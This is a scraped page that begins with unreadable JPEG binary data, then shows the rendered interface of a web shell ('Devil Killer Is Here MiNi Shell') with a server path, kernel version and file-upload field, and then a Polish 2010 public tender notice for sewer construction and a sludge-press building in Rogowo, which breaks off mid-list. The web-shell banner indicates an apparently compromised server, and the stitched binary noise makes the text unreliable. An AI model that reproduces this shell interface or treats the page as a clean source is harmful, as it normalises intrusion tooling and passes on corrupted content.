JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100407/96560-N-2010.html

<p class="kh_header"><b>Rogowo: Budowa kanalizacji ściekowej wraz z przyłączami w miejscowości Lubcz oraz budowa budynku prasy i składowiska osadu po prasie na mechaniczno-biologicznej oczyszczalni ścieków w miejscowości Rogowo.</b><br>
<b>Numer ogłoszenia: 96560 - 2010; data zamieszczenia: 07.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Rogowie , ul. Kościelna 8, 88-420 Rogowo, woj. kujawsko-pomorskie, tel. 052 3024053, faks 052 3024275.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://rogowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji ściekowej wraz z przyłączami w miejscowości Lubcz oraz budowa budynku prasy i składowiska osadu po prasie na mechaniczno-biologicznej oczyszczalni ścieków w miejscowości Rogowo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Budowa kanalizacji ściekowej wraz z przyłączami       w miejscowości Lubcz oraz budowa budynku prasy i składowiska osadu po prasie na mechaniczno-biologicznej oczyszczalni ścieków w miejscowości Rogowo.
Na przedmiot zamówienia składa się wykonanie: 
1)	Budowy kanalizacji grawitacyjnej głównej O 200 mm PCV o długości 1 683,5 m;
Kolektor sanitarny należy wykonać z rur kanalizacyjnych PCV kielichowych, klasy S   O 200 mm, firmy Wavin Metalplast-Buk o łącznej długości 1 683,5 m. Na kanalizacji grawitacyjnej wykonać studzienki rewizyjne z kręgów żelbetonowych z pełnym dnem o średnicy 1200 mm oraz plastikowe typu Tegra o średnicy 425 mm firmy Wavin Metalplast-Buk. Studzienki rozprężne należy wykonać z kręgów żelbetowych o średnicy 1200 mm. Wszystkie studnie O 1200 mm należy przykryć płytami żelbetowymi z włazami O 600 mm typu ciężkiego. Powierzchnie zewnętrzne studzienek zabezpieczyć przez dwukrotne malowanie abizolem R+P. Z uwagi na prowadzenie kolektora w drodze powiatowej Lubcz-Gościeszyn-Trzemeszno oraz wysoki poziom wody gruntowej należy układać w wykopie szalowanym. Na czas budowy wykopy należy odwodnić za pomocą zestawu igłofiltrów. W ramach niniejszych robót należy w kosztach uwzględnić roboty rozbiórkowe i odtworzeniowe nawierzchni asfaltowej na kolektorze sanitarnym-wykonanie na podbudowie nawierzchni z mieszanki mineralno-bitum. gresowej warstwa wiążąca gr. 4 cm- 2885,00 m2 oraz nawierzchnie z mieszanki mineralno bitum. gresowych warstwa ścieralna gr. 3 cm o pow. 4327,50 m2. Sieć kanalizacyjną należy połączyć z istniejącą kanalizacją ściekową.
2)	Budowy przyłączy w ilości 49 sztuk O 160 mm w układzie grawitacyjnym o długości 380,5 m;
Przykanaliki należy wykonać z rur kanalizacyjnych PCV kielichowych, klasy S O 160 mm, firmy Wavin Metalplast-Buk i zakończeniem studzienką typu Tegra O 425 mm, 1,0 m od granicy działki. Dopuszcza się przesunięcie studzienki w głąb działki w przypadku kolizji z istniejącym uzbrojeniem. Ze względu na istniejący asfalt wszystkie przykanaliki należy wykonać metodą przewiertu poziomego - przewierty sterowane.
3)	Budowy rurociągów tłocznych z rur PE typ SDR17.6 PN 7,5 bar O 90 mm   o długości 383,0 m;
4)	Budowy przepompowni ścieków Pp-1, firmy Metalchem-Warszawa (dopuszcza się wybór innego producenta pod warunkiem zachowania tych samych parametrów technicznych lub równoważnych) o średnicy wewnętrznej O 1,50 m z zasilaniem energetycznym, instalacją elektryczną i oświetleniem terenu;
Przepompownię należy wykonać jako studnie monolityczną z polimerobetonu,         z pompami zatapialnymi (1 pracująca+1 rezerwowa) o swobodnym przepływie O 80 mm z niezbędna armaturą oraz sterowaniem. Zbiornik przykryć płytą z włazem. Wokół włazu wykonać barierkę ochronną ze stali kwasoodpornej. W osi włazu wykonać ramę pod wciągnik ręczny (słupy-rura 60,3x3,2h=2,30m, belka-dwuteownik równoległościenny 80 dł. 3,0m), służący do wyciągania pomp z komory przepompowni. Wszystkie elementy stalowe zabezpieczyć antykorozyjnie zestawem farb chlorokauczukowych (podkład+2xnawierzchniowa) Na terenie przepompowni wykonać wjazd z kostki betonowej POLBRUK 10 gr. 8 cm - 40,0 m2, na podkładzie ograniczony obustronnie krawężnikiem betonowym o wym. 15x30x100 cm. Teren przy komorze przepompowni utwardzić kostką betonową chodnikową - 17,5 m2      i ogrodzić ogrodzeniem z siatki stalowej powlekanej PCV na słupkach stalowych rurowych i cokoliku betonowym. Długość ogrodzenia z bramą i furtką - 29,90 m (brama wjazdowa szer. 3,0 m, furtka szer. 1,0 m z kątownika stalowego). Wzdłuż ogrodzenia wykonać pas zieleni w formie żywopłotu krzewy Thuja occidentalis       w ilości 20 sztuk posadzić mijankowo. Teren przepompowni należy oznakować poprzez wykonanie tablicy informacyjnej. Po wykonaniu robót instalacyjno-budowlanych teren poza miejscami utwardzonymi użyźnić glebą i obsiać trawą w tym również skarpy. Dodatkowo przepompownie należy wyposażyć w dialer komórkowy z osprzętem pomocniczym dla realizacji sygnalizowania stanów pracy pomp, poprzez telefon komórkowy w systemie GSM. Wykonanie robot budowlanych i wyposażenie przepompowni ścieków musi odpowiadać wymogom Państwowej Inspekcji Pracy.
5)	Budowy przepompowni ścieków Pp-2, firmy Metalchem-Warszawa (dopuszcza się wybór innego producenta pod warunkiem zachowania tych samych parametrów technicznych lub równoważnych) o średnicy wewnętrznej O 1,20 m z zasilaniem energetycznym, instalacją elektryczną i oświetleniem terenu. Przepompownię należy wykonać jako studnie monolityczną z polimerobetonu, z pompami zatapialnymi (1 pracująca+1 rezerwowa) o swobodnym przepływie O 80 mm z niezbędna armaturą oraz sterowaniem. Zbiornik przykryć płytą z włazem. Wokół włazu wykonać barierkę ochronną ze stali kwasoodpornej. W osi włazu wykonać ramę pod wciągnik ręczny (słupy-rura 60,3x3,2h=2,30m, belka-dwuteownik równoległościenny 80 dł. 3,0m), służący do wyciągania pomp z komory przepompowni. Wszystkie elementy stalowe zabezpieczyć antykorozyjnie zestawem farb chlorokauczukowych (podkład+2xnawierzchniowa) Na terenie przepompowni wykonać wjazd z kostki betonowej POLBRUK 10 gr. 8 cm - 36,24 m2, na podkładzie ograniczony obustronnie krawężnikiem betonowym o wym. 15x30x100 cm. Teren przy komorze przepompowni utwardzić kostką betonową chodnikową - 19,0 m2 i ogrodzić ogrodzeniem z siatki stalowej powlekanej PCV na słupkach stalowych o przekroju rurowym i cokoliku betonowym. Długość ogrodzenia z bramą i furtką - 35,0 m (brama wjazdowa szer. 3,0 m, furtka szer. 1,0 m z kątownika stalowego). Wzdłuż ogrodzenia wykonać pas zieleni w formie żywopłotu krzewy Thuja occidentalis w ilości 25 sztuk posadzić mijankowo. Teren przepompowni należy oznakować poprzez wykonanie tablicy informacyjnej. Po wykonaniu robót instalacyjno-budowlanych teren poza miejscami utwardzonymi użyźnić glebą i obsiać trawą. Dodatkowo przepompownie należy wyposażyć w dialer komórkowy z osprzętem pomocniczym dla realizacji sygnalizowania stanów pracy pomp, poprzez telefon komórkowy w systemie GSM. Wykonanie robot budowlanych i wyposażenie przepompowni ścieków musi odpowiadać wymogom Państwowej Inspekcji Pracy.
6)	Budowy przyłączy wodociągowych doprowadzających wodę na teren przepompowni Pp-1 i Pp-2 z rur PE typ SDR 13.6 PN-10 bar O 40 mm o łącznej długości 18,5 m zakończone studzienką wodomierzową O 1,0 m z wodomierzem skrzydełkowym O 25 mm i zaworem antyskażeniowym. Dla poboru wody należy wykonać hydrant ogrodowy O 32 mm umieszczonym w skrzynce hydrantowej.
7)	Budowy budynku stacji odwodnienia osadu w technologii tradycyjnej tj. ławy fundamentowe żelbetowe, ściany fundamentowe z bloczków betonowych ściany przyziemia z bloczków z betonu komórkowego na zaprawie cementowo-wapiennej, pokryte tynkiem wapienno-cementowym kat. III. Izolacja przeciwwilgociowa ścian i posadzki z dwóch warstw papy na lepiku. Budynek o wymiarach zew. 6,10x8,90 m. Dach jednospadowy o konstrukcji stalowej kryty płytą warstwową o gr. 10 cm. Otwory w ścianie budynku dla przeprowadzenia przenośnika osadu oraz otwór dla przeprowadzenia przenośnika wapna. Stolarka okienna typowa z PCW w kolorze białym, wrota stalowe ocieplone w kolorze białym. W pomieszczeniu prasy należy wykonać fundament pod pompę osadu i pompę elektrolitu. W budynku należy wykonać posadzkę z płytek o wym. 30x30cm na masie klejowej oraz ułożyć płytki  o wym. 20x30 cm na ścianach wysokość 2,0 m powyżej należy wykonać malowanie farbą emulsyjną dwukrotnie. Budynek należy wyposażyć w następujące urządzenia oraz infrastrukturą techniczną: 
a)	Prasę taśmową z zagęszczaczem wstępnym bębnowym (wydajność max 10 m3/h, moc silnika 0,92 kW) MONOBELT NP12 (szafka sterownicza)- 1 kpl, 
b)	pompę śrubowa osadu na prasę PF-MH12-B2 (wydajność max 12,5 m3/d, moc 2,2 kW)- 1 szt, 
c)	zespół przygotowania i dozowania polielektrolitu typ 2CMP10 (wydajność max 1000 l/h, sumaryczna moc silników 1,75 kW) stal nierdzewna DN20- 2 kpl, 
d)	pompę polielektrolitu, śrubowa  PD-MH010-B2 Q=1000 l/h moc 0,25 kW - 1 szt , 
e)	mieszacz statystyczny osadu M0065050 (wlot i wylot DN20) - 1 szt, 
f)	pompę wody płuczącej (zamontowana na prasie wydajność max 6 m3/h, moc silnika 2,2 kW), 
g)	zespół odzysku wody płuczącej  ZOW-01 (wydajność max 6 m3/h) -1 kpl, 
h)	sprężarkę tłokowa bezolejową z przewodem podłączeniowym (wydajność 24l/h, moc silnika 1,1 kW) - 1 szt, 
i)	szafę zasilająco-sterownicza automatycznie i ręcznie- 1 szt, 
j)	przenośnik ślimakowy mieszaniny osadu i wapna typ PS 200 stal kwasoodporna (dł. 5,25 m, moc silnika 2,2 kW), 
k)	rurociąg  tłoczny osadu z mieszacza statycznego na prasę stal nierdzewna DN50 PN 10 - 4,8 m,
l)	przepływomierz elektromagnetyczny do osadu DN65 - 1 szt,
m)	rurociąg tłoczny osadu do pompy śrubowej osadu, stal nierdzewna DN65 PN - 2,3 m
n)	rurociąg dozujący polielektrolit, stal nierdzewna DN20 PN 10 - 7,3 m
o)	zasuwa płaska DN65 do osadu-1 szt,
p)	zasuwa spustowa DN65 z końcówką do przyłączenia węża elastycznego (odwodnienie pionu osadowego na okres zimowy)- 1 szt
q)	rurociąg wody technologicznej PE DN40 - 21,3 m,
r)	rurociąg wody PE DN 25 - 9,00 m,
s)	rurociąg wody PE DN 15 - 1,7 m,
t)	rura preizolowana DN80- doprowadzenie osadu - 3,3 m,
u)	umywalka i podgrzewacz wody 2,5 kW- 1 kpl.
W pomieszczeniu należy wykonać instalację wodociągową oraz instalację kanalizacyjną odprowadzającą odcieki z prasy taśmowej i z płukania posadzki         w pomieszczeniu do istniejącej kanalizacji oraz instalacje elektryczną i wentylację mechaniczną  zgodnie z odrębnym opracowaniem. Odwodnienie posadzki w pomieszczeniu wykonać za pomocą wpustów podłogowych. Do budynku należy wykonać podjazd betonowy i wykonać elewacje budynku polegającą na wykonaniu tynku zewnętrznego w kolorze kremowym oraz cokołu do wysokości 40 cm, który należy obłożyć płytkami elewacyjnymi. Należy wykonać instalację odgromową budynku. 
8)	Budowa wiaty przyczepy osadowej o wymiarach 4,55x8,90 m o konstrukcji stalowej   z dachem jednospadowym, krytym blachą fałdową T-55x188 gr. 0,75 mm, posadzka z kostki brukowej gr. 8 cm na warstwie zagęszczonego piasku, odprowadzenie odcieków z powierzchni posadzki za pomocą odwodnienia liniowego-korytko odwodnieniowe szer. wew. 10 cm, spadek 1 procent, przykryty rusztem z żeliwa dł. 6,0 m klasa obciążeń A-C oraz wyposażeniem- przyczepa samowyładowcza 6,5 t - 1 szt;
9)	Fundamentu pod silos wapna do higienizacji osadu - płyta żelbetowa o wymiarach 3,0x3,0 m, silos o pojemności V=5,0 m3 wykonany ze stali konstrukcyjnej zabezpieczony antykorozyjnie napełniany pneumatycznie, opróżniany grawitacyjnie, wysokość całkowita silosu 5800 mm rozstaw stóp podporowych 1680x1680 mm. Na wyposażenia silosu składać się: drabinka, pomost z barierką, właz z pokrywą, klapa bezpieczeństwa oraz;
a)	instalacja przeciw zbrylaniu elektrowibrator o mocy silnika 0,25 kW - 1 kpl.;
b)	 instalacja dozowania wapna DW-01 moc silnika 0,37 kW wyposażony     w grawitacyjny wskaźnik obrotów z przenośnikiem ślimakowym wapna PS-120/4,8 moc silnika 1,50 kW wykonany ze stali kwasoodpornej - 1 kpl; 
c)	zasuwa nożowa płaska ręczna np. AQUA odcinająca dopływ wapna do podajnika wapna średnica otworu przelotowego O 250 mm, średnica kołnierza 320 mm, maksymalne ciśnienie 8 bar, ręczny mechanizm otwierający- 1 kpl;
d)	mieszacz boczny MB-01 do wzruszania wapna w zasobniki wykonany ze stali kwasoodpornej, moc silnika 1,1 kW - 1 szt;
e)	dozownik wapna DW-01 do dozowania zadanej ilości wapna do mieszania osadów, wydajność 19-95 kg/h o mocy 0,37 kW- 1 szt;
f)	podajnik wapna o dł. 4,8 m do podawania wapna do dozownika wapna, wykonany ze stali kwasoodpornej , moc silnika 1,5 kW - 1 szt.
10)	Estakady rurociągu osadowego z rury preizolowanej o średnicy wew. 80 mm dł. 55,0 m napowietrzny na słupach z rury czarnej rozstawie max. 5,0 m osadzonych w blokach fundamentowych;
11)	Składowisko osadu odwodnionego-płyta betonowa z betonu B-20 gr. 12 cm o wymiarach 14,90x25,40 m ze spadkami w kierunku korytek odwodnienia liniowego szer. 20 cm, spadek dna korytka 1%, pokrycie rusztem z żeliwa dł. 25,0 m, klasa obciążenia D-E. Całość obudowana płytami betonowymi ogrodzeniowymi do wysokości od 1 do 1,2 m od poziomu płyty;
12)	Wykonanie zasilania energetycznego, oświetlenia, przewodów AKP zgodnie  z opracowana dokumentacją techniczną - branża elektryczna;
13)	Wykonanie sieci wodociągowej zewnętrznej zasilającej budynek stacji odwodnienia osadu za pomocą rur PE65 (DN50) PN 10- dł. 41,6 m oraz wykonać odgałęzienie do hydrantu ogrodowego za pomocą rur PE32 PN10- dł. 9,5 m i zakończyć zaworem ze złączką do węża studzienka z kręgów betonowych O 1000 mm - 1 kpl.
14)	Wykonanie zewnętrznej kanalizacji sanitarnej - kolektory odprowadzające ścieki  z budynku, placu, składowiska osadu za pomocą rur PCV 160 mm o długości 49,0 m - spadki 6 promila oraz PCV 200 mm długości 44,0 m - spadki 4,5 i 5promila o istniejącej sieci kanalizacji - ścieki odprowadzone zostaną na reaktory biologiczne w celu oczyszczenia. Rurociąg PCV należy prowadzić w rurze osłonowej stalowej 219,1/8 mm na długości ok. 12 m (pod droga wewnętrzną). Rurociąg przed zamarzaniem należy zabezpieczyć warstwą żużla o grubości 40 cm. Należy wykonać 7 studzienek kanalizacyjnych betonowych o średnicy 1000 mm z włazami typu ciężkiego. 
15)	Wykonanie adaptacji obiektów istniejących dla nowych potrzeb a w szczególności istniejącej instalacji osadowej przez wpięcie nowoprojektowanego przewodu osadowego.
16)	Drogi wewnętrznej z placem manewrowym wykonanych z kostki betonowej typu polbruk, grubości 8 cm na podbudowie betonowej gr. 10 cm - 846,60 m2 z ułożeniem krawężnika o wym. 15x30x100cm dł. 296,80 m oraz drogi dojazdowej z tłucznia;
17)	Ogrodzenia terenu obiektów stacji odwodnienia i składowiska osadu z siatki metalowej powlekanej h=1,50 m na słupkach stalowych na cokole wraz z bramą wjazdową o długości  117,0 m;
18)	Pasa zieleni izolacyjnej;
Należy wykonać pas zieleni średniej o długości 40,0 m wzdłuż ogrodzenia na kierunku północnym i zachodnim ogrodzenia. Pas zieleni wykonać z żywotnika zachodniego (Thuja occidentalis), sadzonki o wysokości 10-20 cm, sadzone          w odstępach  ca 07-1,0 m.
Zakres ww. zamówienia publicznego obejmuje również następujące roboty:
1)	Wykonanie prac towarzyszących (geodezyjne wytyczenie i inwentaryzację powykonawczą w 3 egz.);
2)	Przygotowanie placu budowy w tym doprowadzenie energii elektrycznej do zasilania zaplecza budowy i na potrzeby odwodnienia wykopów;
3)	Urządzenie, oznakowanie i zabezpieczenie placu budowy;
4)	Wykonawca uzyskana zgodę za zajęcie pasa drogowego w drodze powiatowej Nr 2352C Lubcz - Trzemeszno od Zarządu Dróg Powiatowych w Żninie z siedzibą w Podgórzynie oraz uiści opłatę za zajęcie pasa drogowego przez Wykonawcę;
5)	Wykonawca zobowiązany jest opracować projekt organizacji ruchu na czas organizacji robót w drodze powiatowej Nr 2352C Lubcz-Trzemeszno i uzgodnić z: Powiatową Komendą Policji w Żninie, Starostwem Powiatowym w Żninie- Wydział Komunikacji oraz Zarządem Dróg Powiatowych w Żninie z siedzibą w Podgórzanie;
6)	W przypadku wystąpienia skrzyżowań oraz zbliżeń do istniejącego uzbrojenia należy wykonać wykopy próbne w celu dokładnego ich zlokalizowania. Istniejące przewody należy zabezpieczyć przed załamaniem poprzez podwieszenie lub ujęcie rurami połówkowymi z podparciem na ścianach wykopu. Na skrzyżowaniach z istniejącymi kablami należy założyć osłony dwudzielne AROT typ PS-160 o dł. 1,50 m. W rejonie istniejących słupów energetycznych i drzew przy zbliżeniu mniej niż 1,5 m wodociąg układać w rurze ochronnej metodą przecisku poziomego-metodą sterowaną. Wykonawca w przypadku uszkodzenia urządzenia podziemnego winien we własnym zakresie na własny koszt usunąć zaistniałą awarię; 
7)	Wykonawca na czas budowy winien wykonać odwodnienie wykopów za pomocą zestawu igłofiltrów zgodnie z zaleceniami zawartymi w dokumentacji geologicznej dotyczącej; terenu budowy kanalizacji sanitarnej i przepompowni ścieków w m. Lubcz oraz terenu budowy budynku stacji odwadniania osadu i składowiska osadu odwodnionego na terenie oczyszczalni ścieków w Rogowie; 
8)	Wykonawca winien odtworzyć nawierzchnie dróg i chodników według stanu przed rozpoczęciem robót budowlanych w zakresie budowy kanalizacji ściekowej wraz z przyłączami w m. Lubcz  stosownie do wymogów Zarządu Dróg Powiatowych w Żninie z siedzibą w Podgórzynie oraz dróg gminnych o nawierzchni gruntowej z uprzednim zagęszczeniem gruntu;
9)	Tereny tj. teren realizacji ww. zamówienia w m. Lubcz oraz teren oczyszczalni ścieków w Rogowie objęty jest ochroną archeologiczną (koszty nadzoru archeologicznego pokrywa Zamawiający);
10)	Wykonawca będzie zobowiązany do przeprowadzenia rozruchu technologicznego obiektów będących przedmiotem zamówienia publicznego;
11)	Jakość dostarczonych i zastosowanych podczas realizacji przedmiotu zamówienia materiałów, wyrobów i elementów musi być zgodna z normami, atestami, świadectwami dopuszczenia do stosowania i ustaleniami projektów technicznych;
12)	Wykonawca udzieli 60 miesięcznej gwarancji na wykonanie roboty budowlanej liczonej od dnia odbioru przedmiotu wykonanego zamówienia przez Zamawiającego.  
13)	Wykonawca uzyska pozwolenie na użytkowanie obiektów nowo wybudowanych na oczyszczalni ścieków w Rogowie.
Szczegółowy opis przedmiotu zamówienia został wskazany w takich dokumentach jak: projekty budowlano-wykonawcze-branżowe, specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiary robót, oraz dokumentacji geotechnicznej stanowiące załączniki do  niniejszej SIWZ.
Do każdej nazwy firmy, przykładowych znaków towarowych, typów urządzeń, które zostały wymienione projektach budowlano-wykonawczych, specyfikacjach technicznych wykonania i odbioru robót, przedmiarach robót dodaje się lub równoważne. Za równoważne rozumie się materiały lub urządzenia o parametrach nie gorszych niż  wyszczególnione w SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego w trybie zamówienia z wolnej reki, którego wartość nie przekroczy 20 procent wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.40-8, 45.11.12.00-0, 45.23.24.23-3, 45.25.21.00-9, 45.23.14.00-9, 45.31.00.00-3, 45.31.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości 12 000,00 zł (słownie: dwanaście tysięcy złotych).
2.	Wykonawca wnosi wadium przed upływem terminu składania ofert.
3.	Wadium może być wniesione:
1)	w pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
4.	Wadium wniesione w pieniądzu Wykonawca wpłaci przelewem na konto Urzędu Gminy Rogowo BS Strzelno Oddział Rogowo Nr 62 8159 0003 2003 0300 0550 0002 z dopiskiem Budowa kanalizacji ściekowej wraz z przyłączami w m. Lubcz oraz budowa budynku prasy i składowiska osadu po prasie na mechaniczno-biologicznej oczyszczalni ścieków w m. Rogowo
Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. 
5.	Wadium wnoszone w innej formie jak pieniądze Wykonawca składa w oryginale           w Urzędzie Gminy w Rogowie, pokój nr 11 lub zamieszcza w odrębnej kopercie i składa w miejscu wyznaczonym na składanie ofert w godzinach od 7.15 do 15.15. Nie należy załączać oryginału dokumentu wadialnego do oferty.
6.	Gwarancje ubezpieczeniowe lub gwarancje bankowe oraz poręczenia złożone jako zabezpieczenie wadium muszą posiadać okres ważności nie krótszy niż okres związania    z ofertą oraz zawierać stwierdzenie, że na pierwsze żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkiem przetargu, następuje bezwarunkowa wpłata bez jakichkolwiek zastrzeżeń.
7.	Brak wniesienia wadium na warunkach jak wyżej spowoduje wykluczenie Wykonawcy z postępowania (art. 24 ust. 2 pkt 2 ustawy).
8.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Wykonawca traci wadium wraz z odsetkami w sytuacjach określonych w art. 46 ust. 4a i 5 ustawy tj.:
